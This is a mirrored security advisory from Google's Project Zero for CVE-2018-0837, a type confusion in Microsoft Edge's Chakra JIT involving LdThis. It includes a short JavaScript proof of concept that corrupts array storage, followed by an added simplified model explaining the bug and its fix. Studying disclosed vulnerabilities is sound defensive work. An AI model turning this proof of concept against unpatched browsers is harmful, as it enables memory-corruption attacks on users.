Packet Storm | Google Security Research | PACKETSTORM:146395
Feb 15, 2018

Microsoft Edge Chakra JIT LdThis Type Confusion

Google Security Research, via packetstormsecurity.com

EPSS: 0.964 (High), percentile 99.4%

Microsoft Edge: Chakra: JIT: LdThis type confusion

CVE-2018-0837

The JIT assumes the value type of an LdThis instruction is "Object". Since "this" can be another kind of object, such as an array, the value type has to be "LikelyObject" instead; otherwise, operations on "this" are not checked properly.

PoC:

```js
// Called repeatedly with a plain object as `this` so the JIT compiles it with
// `this` typed as "Object"; `arr` is a native float array throughout the warm-up.
function opt(arr) {
  arr[0] = 1.1;           // arr is known to the JIT as a float array after this store
  this[0] = {};           // treated as a plain-object store: arr's known type is not invalidated
  arr[0] = 2.3023e-320;   // emitted as an unchecked raw double store into arr
}

function main() {
  let arr = [1.1];
  for (let i = 0; i < 10000; i++) {
    opt.call({}, arr);    // warm up: `this` really is a plain object here
  }

  opt.call(arr, arr);     // now `this` aliases arr; the object store converts arr to a var array
  print(arr);             // ch (ChakraCore shell) built-in
}

main();
```

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.

Found by: lokihardt
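The one-sentence description above compresses a fair amount of JIT reasoning: why does an over-confident type on `this` corrupt a different variable, `arr`? The following is an added, deliberately simplified model of that reasoning, written for this page; it is not ChakraCore code, and every name in it (`ModelArray`, `slowStore`, `rawFloatStore`, `compileOpt`, `Definite`, `Likely`) is invented for the illustration. It "compiles" the PoC's `opt` twice, once under the vulnerable assumption (`this` is definitely an Object) and once under the corrected one (`this` is only LikelyObject), and reports whether the second store to `arr` ends up writing a raw double into an array whose storage has silently become tagged values.

```javascript
// Simplified model of the value-type reasoning behind CVE-2018-0837.
// Constructed illustration only; not ChakraCore code. All names are invented.

// A value type is a kind plus whether the JIT treats it as proven ("definite")
// or merely speculated ("likely"). Only non-definite types force the JIT to
// keep checking at runtime.
const Definite = (kind) => ({ kind, definite: true });
const Likely = (kind) => ({ kind, definite: false });

// Model of a JS array whose elements live either as raw doubles ("float") or
// as tagged values ("var"). Storing a non-number into a float array converts it.
class ModelArray {
  constructor(floats) {
    this.storage = "float";
    this.elements = floats.slice();
  }
}

// Generic runtime store helper: what the interpreter / slow path does.
function slowStore(receiver, index, value) {
  if (receiver instanceof ModelArray) {
    if (receiver.storage === "float" && typeof value !== "number") {
      receiver.storage = "var"; // slots now hold tagged values, not raw doubles
    }
    receiver.elements[index] = value;
  } else {
    receiver[index] = value;    // plain-object property store
  }
}

// JIT fast path for an array the compiler still believes is a float array:
// writes the raw double without consulting receiver.storage.
function rawFloatStore(arr, index, value) {
  arr.elements[index] = { rawDouble: value }; // models an unchecked 8-byte write
}

// "Compile" the PoC's opt() under a given assumption about the type of `this`
// and return a function mimicking the generated code.
function compileOpt(thisType) {
  // A store through a receiver that is definitely a plain object cannot change
  // any array's storage kind, so the JIT keeps what it knows about arr.
  // If `this` is only likely an object it may be an array (even arr itself),
  // so the store must invalidate the known array type.
  const storeKillsArrayType = !(thisType.definite && thisType.kind === "Object");

  return function opt(arr, thisObj) {
    slowStore(arr, 0, 1.1);       // arr[0] = 1.1
    let arrKnownFloat = true;     // JIT belief: arr is a float array now

    slowStore(thisObj, 0, {});    // this[0] = {}  (at runtime this may convert arr)
    if (storeKillsArrayType) arrKnownFloat = false;

    if (arrKnownFloat) {
      rawFloatStore(arr, 0, 2.3023e-320);  // unchecked fast path
    } else {
      slowStore(arr, 0, 2.3023e-320);      // re-checks storage kind first
    }
    return arr;
  };
}

// A raw double sitting in a slot of a var array is the confusion: the engine
// would later read those bytes as a tagged value.
function isConfused(arr) {
  return arr.storage === "var" &&
    arr.elements.some((e) => e !== null && typeof e === "object" && "rawDouble" in e);
}

// Run opt.call(thisObj, arr); by default `this` aliases arr as in the PoC's last call.
function runScenario(thisType, thisAliasesArr = true) {
  const arr = new ModelArray([1.1]);
  const opt = compileOpt(thisType);
  opt(arr, thisAliasesArr ? arr : {});
  return isConfused(arr);
}

console.log("LdThis = Object       ->", runScenario(Definite("Object")) ? "type confusion" : "safe");
console.log("LdThis = LikelyObject ->", runScenario(Likely("Object")) ? "type confusion" : "safe");
```

The model makes the dependency explicit: nothing about `arr`'s own type is wrong, and the final store to `arr` is only unsafe because the JIT concluded that the intervening store through `this` could not have touched an array. Downgrading `this` to LikelyObject is what forces that conclusion to be dropped, which is exactly the fix the advisory calls for.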